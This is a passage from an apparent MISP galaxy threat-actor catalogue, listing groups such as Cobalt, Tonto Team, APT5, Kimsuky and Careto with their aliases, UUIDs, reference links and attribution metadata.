- https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['Venezuela', 'Russia', 'Cuba', 'China', 'Belgium', 'Ecuador', 'Brazil', 'Spain', 'Germany', 'France', 'Colombia', 'Peru', 'Sweden', 'United States', 'Malaysia'] |
cfr-target-category | ['Military', 'Government'] |
cfr-type-of-incident | Espionage |
Cobalt
A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobalt.
Known Synonyms |
---|
COBALT SPIDER |
Cobalt Gang |
Cobalt Group |
G0080 |
GOLD KINGSWOOD |
Mule Libra |
Internal MISP references
UUID 01967480-c49b-4d4a-a7fa-aef0eaf535fe
which can be used as unique global reference for Cobalt
in MISP communities and other software using the MISP galaxy
External references
- https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/ - webarchive
- https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/ - webarchive
- https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/ - webarchive
- https://www.group-ib.com/blog/cobalt - webarchive
- https://www.reuters.com/article/us-taiwan-cyber-atms/taiwan-atm-heist-linked-to-european-hacking-spree-security-firm-idUSKBN14P0CX - webarchive
- https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/ - webarchive
- https://www.riskiq.com/blog/labs/cobalt-strike/ - webarchive
- https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/ - webarchive
- https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain - webarchive
- https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested - webarchive
- https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf - webarchive
- https://attack.mitre.org/groups/G0080/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-kingswood - webarchive
- https://unit42.paloaltonetworks.com/atoms/mulelibra/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
TA459
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA459.
Known Synonyms |
---|
G0062 |
Internal MISP references
UUID c6472ae1-c6ad-4cf1-8d6e-8c94b94fe314
which can be used as unique global reference for TA459
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Cyber Berkut
Internal MISP references
UUID 4d9f68ba-cb2b-40bf-ba4b-6a5a9f2e1cf8
which can be used as unique global reference for Cyber Berkut
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
Tonto Team
Tonto Team is a Chinese-speaking APT group that has been active since at least 2013. They primarily target military, diplomatic, and infrastructure organizations in Asia and Eastern Europe. The group has been observed using various malware, including the Bisonal RAT and ShadowPad. They employ spear-phishing emails with malicious attachments as their preferred method of distribution.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tonto Team.
Known Synonyms |
---|
BRONZE HUNTLEY |
COPPER |
CactusPete |
Earth Akhlut |
G0131 |
KARMA PANDA |
PLA Unit 65017 |
Red Beifang |
TAG-74 |
Internal MISP references
UUID 0ab7c8de-fc23-4793-99aa-7ee336199e26
which can be used as unique global reference for Tonto Team
in MISP communities and other software using the MISP galaxy
External references
- https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ - webarchive
- https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf - webarchive
- https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ - webarchive
- https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html - webarchive
- https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf - webarchive
- https://www.recordedfuture.com/multi-year-chinese-apt-campaign-targets-south-korean-academic-government-political-entities - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Eastern Europe', 'Japan', 'South Korea', 'Taiwan', 'US'] |
cfr-target-category | ['Military', 'Government', 'Private sector'] |
country | CN |
Danti
Internal MISP references
UUID fb745fe1-5478-4d47-ad3d-7389fa4a6f77
which can be used as unique global reference for Danti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT5
We have observed one APT group, which we call APT5, particularly focused on telecommunications and technology companies. More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors. Several times, APT5 has targeted organizations and personnel based in Southeast Asia. APT5 has been active since at least 2007. It appears to be a large threat group that consists of several subgroups, often with distinct tactics and infrastructure. APT5 has targeted or breached organizations across multiple industries, but its focus appears to be on telecommunications and technology companies, especially information about satellite communications. APT5 targeted the network of an electronics firm that sells products for both industrial and military applications. The group subsequently stole communications related to the firm’s business relationship with a national military, including inventories and memoranda about specific products they provided. In one case in late 2014, APT5 breached the network of an international telecommunications company. The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company’s relationships with other telecommunications companies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT5.
Known Synonyms |
---|
BRONZE FLEETWOOD |
KEYHOLE PANDA |
MANGANESE |
Mulberry Typhoon |
Poisoned Flight |
TEMP.Bottle |
Internal MISP references
UUID a47b79ae-7a0c-4308-9efc-294af19cc795
which can be used as unique global reference for APT5
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/current-threats/apt-groups.html - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-fleetwood - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Electronic', 'Telecoms', 'Technology'] |
Tick
Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tick.
Known Synonyms |
---|
BRONZE BUTLER |
G0060 |
Nian |
PLA Unit 61419 |
REDBALDKNIGHT |
STALKER PANDA |
Stalker Taurus |
Internal MISP references
UUID add6554a-815a-4ac3-9b22-9337b9661ab8
which can be used as unique global reference for Tick
in MISP communities and other software using the MISP galaxy
External references
- https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf - webarchive
- https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan - webarchive
- https://www.secureworks.jp/resources/rp-bronze-butler - webarchive
- https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/ - webarchive
- http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/bronze-butler - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/ - webarchive
- https://attack.mitre.org/groups/G0060/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-butler - webarchive
- https://unit42.paloaltonetworks.com/atoms/stalkertaurus/ - webarchive
- https://twitter.com/iiyonite/status/1384431491485155331 - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Japan', 'China', 'Korea (Republic of)', 'Russian Federation'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
targeted-sector | ['Infrastructure', 'Industrial', 'Manufacturing', 'Diplomacy', 'News - Media', 'Political party', 'Engineering'] |
APT26
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT26.
Known Synonyms |
---|
BRONZE EXPRESS |
JerseyMikes |
TECHNETIUM |
TURBINE PANDA |
Internal MISP references
UUID c097471c-2405-4393-b6d7-afbcb5f0cd11
which can be used as unique global reference for APT26
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
SABRE PANDA
Internal MISP references
UUID 67adfa07-869f-4052-9d56-b88a51489902
which can be used as unique global reference for SABRE PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
BIG PANDA
Internal MISP references
UUID 06e89270-ca1b-4cd4-85f3-940d23c76766
which can be used as unique global reference for BIG PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
POISONUS PANDA
Internal MISP references
UUID 5bc7382d-ddc6-46d3-96f5-1dbdadbd601c
which can be used as unique global reference for POISONUS PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Ghost Jackal
Internal MISP references
UUID 7ad01582-d6a7-4a40-a0ee-7727e268cd15
which can be used as unique global reference for Ghost Jackal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEMP.Hermit
Internal MISP references
UUID 73c636ae-e55c-4167-bf40-315789698adb
which can be used as unique global reference for TEMP.Hermit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | KP |
Mofang
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mofang.
Known Synonyms |
---|
BRONZE WALKER |
Superman |
Internal MISP references
UUID 999f3008-2b2f-467d-ab4d-c5a2fd80b344
which can be used as unique global reference for Mofang
in MISP communities and other software using the MISP galaxy
External references
- https://blog.fox-it.com/2016/06/15/mofang-a-politically-motivated-information-stealing-adversary/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/mofang - webarchive
- https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-walker - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Myanmar', 'Germany', 'Singapore', 'Canada', 'India', 'United States', 'South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
CopyKittens
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CopyKittens.
Known Synonyms |
---|
G0052 |
Slayer Kitten |
Internal MISP references
UUID 8cca9a1d-66e4-4bc4-ad49-95f759f4c1ae
which can be used as unique global reference for CopyKittens
in MISP communities and other software using the MISP galaxy
External references
- https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf - webarchive
- https://www.domaintools.com/resources/blog/case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastr - webarchive
- http://www.clearskysec.com/copykitten-jpost/ - webarchive
- http://www.clearskysec.com/tulip/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/copykittens - webarchive
- https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf - webarchive
- https://attack.mitre.org/groups/G0052/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Jordan', 'Saudi Arabia', 'Germany', 'United States'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
EvilPost
Internal MISP references
UUID 9035bfbf-a73f-4948-9df2-bd893e9cafef
which can be used as unique global reference for EvilPost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TEST PANDA
Internal MISP references
UUID cd6ac640-9ae9-4aa9-89cd-89b95be1a3ab
which can be used as unique global reference for TEST PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Madi
Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.
Internal MISP references
UUID d5dacda0-12c2-4e80-bdf2-1c5019ec40e2
which can be used as unique global reference for Madi
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-madi-campaign-part-i-5/33693/ - webarchive
- https://securelist.com/the-madi-campaign-part-ii-53/33701/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/madi - webarchive
- https://www.kaspersky.com/about/press-releases/2012_kaspersky-lab-and-seculert-announce--madi--a-newly-discovered-cyber-espionage-campaign-in-the-middle-east - webarchive
- https://threatpost.com/new-and-improved-madi-spyware-campaign-continues-072512/76849/ - webarchive
- https://web.archive.org/web/20120718173322/https://www.symantec.com/connect/blogs/madi-attacks-series-social-engineering-campaigns - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Iran', 'Pakistan', 'Israel', 'United States'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Infrastructure', 'Engineering', 'Government, Administration', 'Finance'] |
ELECTRIC PANDA
Internal MISP references
UUID 69059ec9-45c9-4961-a07e-6b2f2228f0ce
which can be used as unique global reference for ELECTRIC PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
APT4
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT4.
Known Synonyms |
---|
BRONZE EDISON |
MAVERICK PANDA |
PLA Navy |
SODIUM |
Salmon Typhoon |
Internal MISP references
UUID 8e28dbee-4e9e-4491-9a6c-ee9c9ec4b28b
which can be used as unique global reference for APT4
in MISP communities and other software using the MISP galaxy
External references
- https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/ - webarchive
- https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919 - webarchive
- https://www.cfr.org/interactive/cyber-operations/sykipot - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-edison - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States', 'United Kingdom', 'Hong Kong'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | CN |
Kimsuky
This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kimsuky.
Known Synonyms |
---|
APT43 |
Black Banshee |
Emerald Sleet |
G0086 |
Operation Stolen Pencil |
Springtail |
THALLIUM |
Thallium |
Velvet Chollima |
Internal MISP references
UUID bcaaad6f-0597-4b89-b69b-84a6be2b7bc3
which can be used as unique global reference for Kimsuky
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/kimsuky - webarchive
- https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html - webarchive
- https://youtu.be/hAsKp43AZmM?t=1027 - webarchive
- https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1 - webarchive
- https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia - webarchive
- https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - webarchive
- https://attack.mitre.org/groups/G0086/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-301a - webarchive
- https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite - webarchive
- https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report - webarchive
- https://asec.ahnlab.com/en/57873/ - webarchive
- https://asec.ahnlab.com/en/61082/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-29/ - webarchive
- https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://ctoatncsc.substack.com/p/cto-at-ncsc-summary-week-ending-may-16b - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/springtail-kimsuky-backdoor-espionage - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Korea (Democratic People's Republic of) |
cfr-suspected-victims | ['Ministry of Unification', 'Sejong Institute', 'Korea Institute for Defense Analyses', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | KP |
targeted-sector | ['Research - Innovation', 'Energy', 'Defense', 'Diplomacy', 'Academia - University ', 'News - Media'] |
Related clusters
Snake Wine
While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals and that began around August 2016. The later registration style was eerily close to previously registered APT28 domains; however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published an analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future, as the group is just starting to build out and utilize its current attack infrastructure.
Internal MISP references
UUID 7b6ba207-94de-4f94-bc7f-52cd0dafade5
which can be used as unique global reference for Snake Wine
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Careto
This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or “Mask”) which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date. What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32- and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Careto.
Known Synonyms |
---|
Mask |
The Mask |
Ugly Face |
Internal MISP references
UUID 069ba781-b2d9-4403-9d9d-c599f5e0181d
which can be used as unique global reference for Careto
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Spain |
cfr-suspected-victims | ['Morocco', 'France', 'Libya', 'Venezuela', 'Poland', 'Brazil', 'Spain', 'United States', 'South Africa', 'Tunisia', 'United Kingdom', 'Switzerland', 'Iran', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | ES |
GIBBERISH PANDA
Internal MISP references
UUID b07cf296-7ab9-4b85-a07e-421607c212b0
which can be used as unique global reference for GIBBERISH PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
OnionDog
This threat actor targets the South Korean government, transportation, and energy sectors.
Internal MISP references
UUID 5898e11e-a023-464d-975c-b36fb1639e69
which can be used as unique global reference for OnionDog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Unknown |
cfr-suspected-victims | ['South Korea'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | KP |
Clever Kitten
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clever Kitten.
Known Synonyms |
---|
Group 41 |
Internal MISP references
UUID d56c99fa-4710-472c-81a6-41b7a84ea4be
which can be used as unique global reference for Clever Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Related clusters
ANDROMEDA SPIDER
Internal MISP references
UUID e85ab78c-5e86-403c-b444-9cdcc167fb77
which can be used as unique global reference for ANDROMEDA SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Caliphate Army
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber Caliphate Army.
Known Synonyms |
---|
CCA |
CyberCaliphate |
Islamic State Hacking Division |
UUC |
United Cyber Caliphate |
Internal MISP references
UUID 76f6ad4e-2ff3-4ccb-b81d-18162f290af0
which can be used as unique global reference for Cyber Caliphate Army
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
MAGNETIC SPIDER
Internal MISP references
UUID 430ba885-cd24-492e-804c-815176ed9b1e
which can be used as unique global reference for MAGNETIC SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
SINGING SPIDER
Internal MISP references
UUID 769bf551-ff39-4f84-b7f2-654a28df1e50
which can be used as unique global reference for SINGING SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber fighters of Izz Ad-Din Al Qassam
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cyber fighters of Izz Ad-Din Al Qassam.
Known Synonyms |
---|
Fraternal Jackal |
Internal MISP references
UUID 22c2b363-5d8f-4b04-96db-1b6cf4d7e8db
which can be used as unique global reference for Cyber fighters of Izz Ad-Din Al Qassam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
APT6
The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,” Deepen said.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT6.
Known Synonyms |
---|
1.php Group |
Internal MISP references
UUID 1a2592a3-eab7-417c-bf2d-9c0558c2b3e7
which can be used as unique global reference for APT6
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
AridViper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AridViper.
Known Synonyms |
---|
APT-C-23 |
Arid Viper |
DESERTVARNISH |
Desert Falcon |
Renegade Jackal |
UNC718 |
Internal MISP references
UUID 0cfff0f4-868c-40a1-b9b4-0d153c0b33b6
which can be used as unique global reference for AridViper
in MISP communities and other software using the MISP galaxy
External references
- http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-arid-viper.pdf - webarchive
- http://securityaffairs.co/wordpress/33785/cyber-crime/arid-viper-israel-sex-video.html - webarchive
- https://securelist.com/blog/research/68817/the-desert-falcons-targeted-attacks/ - webarchive
- https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/ - webarchive
- https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Operation-Arid-Viper-Slithers-Back-Into-View - webarchive
- http://blog.talosintelligence.com/2017/06/palestine-delphi.html - webarchive
- https://www.threatconnect.com/blog/kasperagent-malware-campaign/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/sexually-explicit-material-used-as-lures-in-cyber-attacks?linkId=12425812 - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064309/The-Desert-Falcons-targeted-attacks.pdf - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['United States', 'Israel', 'Palestine', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Defense', 'Energy', 'Finance', 'Education', 'High-Tech', 'Telecoms', 'Transportation', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Military'] |
cfr-type-of-incident | Espionage |
country | PS |
DEXTOROUS SPIDER
Internal MISP references
UUID 445c7b62-028b-455e-9d65-74899b7006a4
which can be used as unique global reference for DEXTOROUS SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Unit 8200
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Unit 8200.
Known Synonyms |
---|
Duqu Group |
Internal MISP references
UUID e9a6cbd7-ca27-4894-ae20-9d11c06fdc02
which can be used as unique global reference for Unit 8200
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/ - webarchive
- https://archive.org/details/Stuxnet - webarchive
- https://www.cfr.org/interactive/cyber-operations/duqu - webarchive
- https://www.cfr.org/interactive/cyber-operations/duqu-20 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Israel |
cfr-suspected-victims | ['Iran', 'Sudan'] |
cfr-target-category | ['Military', 'Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | IL |
White Bear
